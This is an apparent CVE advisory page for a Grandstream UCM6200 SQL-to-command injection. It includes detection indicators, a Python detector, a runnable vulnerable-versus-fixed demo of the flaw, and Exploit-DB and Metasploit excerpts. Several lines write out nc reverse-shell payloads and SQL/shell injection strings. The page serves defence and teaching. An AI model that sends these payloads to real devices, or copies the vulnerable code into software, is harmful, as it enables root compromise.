CVE-2020-5722
Published 2020-03-23
Priority P1 · 96 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (remediation due 2022-07-28)
Exploited in the wild
EPSS: 83.93% (99.7th percentile)
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| grandstream | ucm6200_firmware | < 1.0.19.20 | 1.0.19.20 |
Detection & IOCs (extracted from sources)
- Exploit payload (POST body): action=sendPasswordEmail&user_name=admin' or 1=1--`;`nc${IFS}<lhost>${IFS}<lport>${IFS}-e${IFS}/bin/sh`;`
- Detect exploitation attempts by monitoring HTTP POST requests to /cgi with action=sendPasswordEmail and SQL injection metacharacters (e.g., ' or 1=1--) in the user_name parameter.
- The exploit payload uses shell metacharacters injected via popen(): look for backtick-wrapped commands and ${IFS} substitution in HTTP POST bodies targeting the user_name parameter.
- Hoaxcalls C2 bot nicks always start with 'XTC|' followed by 9 random characters; use this pattern to detect infected hosts communicating over IRC.
- Palo Alto Networks threat prevention signatures 57897 and 57892 cover active exploitation of CVE-2020-5722 and CVE-2020-8515 respectively.
- Shodan query ssl:"Grandstream" "Set-Cookie: TRACKID" identifies internet-exposed Grandstream UCM62xx devices potentially vulnerable to CVE-2020-5722.
- The Hoaxcalls malware uses XOR key 0xEC (derived from 5 table keys) to encrypt strings; the decrypted marker string 'hubnr and vbrxmr was here' at index 0x21 can be used as a memory/binary signature.
- Monitor for outbound IRC connections to 178.32.148.5 on TCP port 1337 as a C2 beacon indicator for Hoaxcalls-infected devices.
- The exploit targets the sendPasswordEmail action on the /cgi endpoint over HTTPS port 8089; alert on unauthenticated POST requests to this endpoint from external IPs.
- Note: the shell metacharacter injection vector (RCE) was inadvertently patched in 1.0.19.20 as a side-effect of fixing CVE-2019-10662; the underlying SQL injection was only fully patched in 1.0.20.17. Devices on 1.0.19.x are still vulnerable to HTML injection via the same endpoint.
- Note: Hoaxcalls group 2 and 3 samples move propagation out of flooder commands and execute it at startup, and the malicious HTTP requests they send differ slightly from group 1; detection rules should account for all three payload variants.
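A detector for the request-level indicators listed above, written here as an added example rather than taken from any of the sources: it URL-decodes each POST body, requires action=sendPasswordEmail, and grades user_name on whether it carries the SQL metacharacters of stage 1, the shell metacharacters (backticks, ${IFS}, ;) of stage 2, or both. The sample bodies are constructed for the example, not captured traffic; the verdict labels are this example's own.

```python
"""Classify POST bodies sent to /cgi for CVE-2020-5722 exploitation attempts.

Added example; not a rule shipped by any source on this page.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# (label, raw POST body) - constructed samples, not captured traffic.
# ';' and '`' are percent-encoded as a real client would send them.
SAMPLES: List[Tuple[str, str]] = [
    ("legit-reset", "action=sendPasswordEmail&user_name=admin"),
    ("sqli-only", "action=sendPasswordEmail&user_name=admin%27%20or%201%3D1--"),
    ("sqli-plus-cmdi",
     "action=sendPasswordEmail&user_name=admin%27%20or%201%3D1--"
     "%60%3B%60nc${IFS}10.0.0.3${IFS}4444${IFS}-e${IFS}/bin/sh%60%3B%60"),
    ("other-action", "action=getInfo"),
    ("cmdi-no-sqli", "action=sendPasswordEmail&user_name=bob%60id%60"),
]

# Stage 1: a quote followed by a boolean tail, or a SQL comment opener.
SQLI_RE = re.compile(r"'\s*(or|and)\b|--|/\*", re.IGNORECASE)
# Stage 2: backtick / $( ) substitution, ${IFS} as a space, ; and | separators.
CMDI_RE = re.compile(r"`|\$\{IFS\}|\$\(|;|\|")


def classify(body: str) -> Optional[str]:
    """Return a verdict for one POST body, or None if it is not the targeted action."""
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes
    if params.get("action", [""])[0] != "sendPasswordEmail":
        return None
    user_name = params.get("user_name", [""])[0]
    sqli = SQLI_RE.search(user_name) is not None
    cmdi = CMDI_RE.search(user_name) is not None
    if sqli and cmdi:
        return "cve-2020-5722-rce"    # root-shell chain, firmware < 1.0.19.20
    if sqli:
        return "cve-2020-5722-sqli"   # SQLi / HTML injection, firmware < 1.0.20.17
    if cmdi:
        return "shell-metachar"       # worth a look, but not the documented chain
    return "benign"


def scan(samples: List[Tuple[str, str]] = SAMPLES) -> Dict[str, Optional[str]]:
    """Run classify() over labelled bodies and return label -> verdict."""
    return {label: classify(body) for label, body in samples}


if __name__ == "__main__":
    for label, verdict in scan().items():
        print(f"{label:16s} -> {verdict}")
```

Because the management interface is HTTPS on port 8089, this has to run on TLS-terminated traffic (a reverse proxy or inline decryption) or on the device's own web-server log; a raw packet capture will not expose the body. The regexes are deliberately loose (any `--` in a username trips stage 1), which is the right trade-off for a parameter that legitimately holds only account names.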
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | | 9.8 | CRITICAL | |
| CISA | | 9.8 | CRITICAL | |
CISA
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2020-5722 [CRITICAL] CWE-89 Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Vulnerability: Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Affected: Grandstream UCM6200
Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-5722
Remediation Due Date: 2022-07-28
GHSA
GHSA-cggp-723h-vg48: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request
ghsa_unreviewed·2022-05-24
CVE-2020-5722 [HIGH] CWE-89 GHSA-cggp-723h-vg48: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.
VulnCheck
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5722 [CRITICAL] CWE-89 Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.
Affected: Grandstream UCM6200
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/
- https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
- https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
- https://blog.radware.com/security/botnets/2020/05/ghosting-bots-the-story-of-hoaxcalls-failures/
- https://blog.netlab.360.com/ddos-botnet-moobot-en/
- https://unit42.paloaltonetworks.com
No detection rules found.
Exploit-DB
UCM6202 1.0.18.13 - Remote Command Injection
exploitdb·2020-03-24·CVSS 9.8
CVE-2020-5722 [CRITICAL] UCM6202 1.0.18.13 - Remote Command Injection
UCM6202 1.0.18.13 - Remote Command Injection
---
# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: http://www.grandstream.com
# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
# Advisory: https://www.tenable.com/security/research/tra-2020-15
#
# Sample output:
# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
# [+] Sending getInfo request to https://192.168.2.1:8089/cgi
# [+] Remote target info:
# -> Model: UCM6202
# -> Version: 1.0.18.13
# [+] Vulnerable version!
# [+] Sending exploit. Reverse shell to 192.168.2.107:127
Metasploit
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
metasploit·CVSS 8.8
CVE-2020-5722 [HIGH] Grandstream UCM62xx IP PBX sendPasswordEmail RCE
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically no assigned CVE, but inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages:
1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user-provided username is passed to a Python script via the shell. Like so:
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e
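The two-stage chain the module description lays out, reduced to a runnable Python model. This is an added example, not the device firmware and not the Metasploit module: stage 1 interpolates the "Forgot Password" username into a SELECT, stage 2 hands the same string to a shell to run the mailer. The real sink wraps the name in a quoted heredoc inside backticks; this stand-in passes it to sh -c directly and uses printf in place of sendMail.py so nothing is mailed. The users table, the e-mail addresses and the payload are constructed for the example, and the payload is shaped so that it works against both the SQL and the shell sink at once.

```python
"""Model of the two-stage SQLi -> command-injection chain (CVE-2020-5722).

Added example. Vulnerable and fixed variants of each stage side by side.
"""
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the PBX user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "admin@pbx.example"), ("bob", "bob@pbx.example")])
    return db


# --- stage 1: username lookup ---------------------------------------------

def lookup_email_vulnerable(db, user_name):
    # String interpolation: a quote in user_name closes the literal and
    # "or 1=1--" makes the WHERE clause true for every row.
    sql = "SELECT email FROM users WHERE user_name = '%s'" % user_name
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_email_fixed(db, user_name):
    # Bound parameter: the payload is compared as an ordinary string.
    row = db.execute("SELECT email FROM users WHERE user_name = ?",
                     (user_name,)).fetchone()
    return row[0] if row else None


# --- stage 2: mailer invocation -------------------------------------------

def send_mail_vulnerable(user_name, email):
    # Shell command line built from user input (the popen() pattern).
    # printf stands in for sendMail.py; the quoting is what matters.
    cmd = "printf 'to %%s: user %%s\\n' %s %s" % (email, user_name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def send_mail_fixed(user_name, email):
    # argv list, no shell: metacharacters stay inside one argument.
    return subprocess.run(["printf", "to %s: user %s\n", email, user_name],
                          capture_output=True, text=True).stdout


def forgot_password(db, user_name, fixed=False):
    """The 'Forgot Password' flow: look the user up, then mail them."""
    lookup = lookup_email_fixed if fixed else lookup_email_vulnerable
    mailer = send_mail_fixed if fixed else send_mail_vulnerable
    email = lookup(db, user_name)
    if email is None:
        return "no such user"
    return mailer(user_name, email)


# Constructed payload valid for both stages. In SQL, '--' comments out the
# rest of the query. In sh, the second quote re-balances quoting so that
# ";echo INJECTED" runs as a separate command and "#'" comments out the rest.
PAYLOAD = "z' or 1=1--';echo INJECTED #'"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", repr(forgot_password(db, PAYLOAD)))
    print("fixed:     ", repr(forgot_password(db, PAYLOAD, fixed=True)))
```

Run stand-alone, the vulnerable path resolves a non-existent user to the first row (admin) and the mailer's stdout carries the output of the injected echo; with both fixes in place the same input is rejected at lookup, and even if it reached the mailer it would be one literal argument. This mirrors the page's note that the shell vector and the SQL injection were closed in different firmware releases: removing either stage alone breaks the root-shell chain, but only parameterising the query removes the SQL injection itself.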
Nuclei
Grandstream UCM6200 - SQL Injection
nuclei·CVSS 9.8
CVE-2020-5722 [CRITICAL] Grandstream UCM6200 - SQL Injection
Grandstream UCM6200 - SQL Injection
Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
Template:
id: CVE-2020-5722
info:
  name: Grandstream UCM6200 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
  impact: |
    Attackers can execute root shell commands or inject malicious HTML, leading to full device compromise or phishing attacks.
  remediation: |
    Update to version 1.0
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Tags: Threat Research, Vulnerabilities, IoT, Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Unit42
Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
blogs_unit42·2020-04-03·CVSS 9.8
CVE-2020-5722 [CRITICAL] Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Ken Hsu
Haozhe Zhang
Zhibin Zhang
Ruchna Nigam
Published: April 3, 2020
Tags: Threat Research, Vulnerabilities, CVE-2020-5722, CVE-2020-8515, DDoS, Gafgyt
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722. As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devices identified during our research prior to publication in an effort to help with awareness and remediation. The Grandstream devices are business telephone systems providers over IP, whereas the latter are routers.
Both CVE-2020-8515 and CVE-2020-5722 have a critical rating (i.e CVSS v3.1 score of
Tenable
Grandstream UCM62xx SQL Injection
blogs_tenable·2020-03-23
Grandstream UCM62xx SQL Injection
References
- http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html
- http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html
- https://www.tenable.com/security/research/tra-2020-15
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722
Timeline
- 2020-03-23: Published
- 2022-01-28: Added to CISA KEV
- Exploited in the wild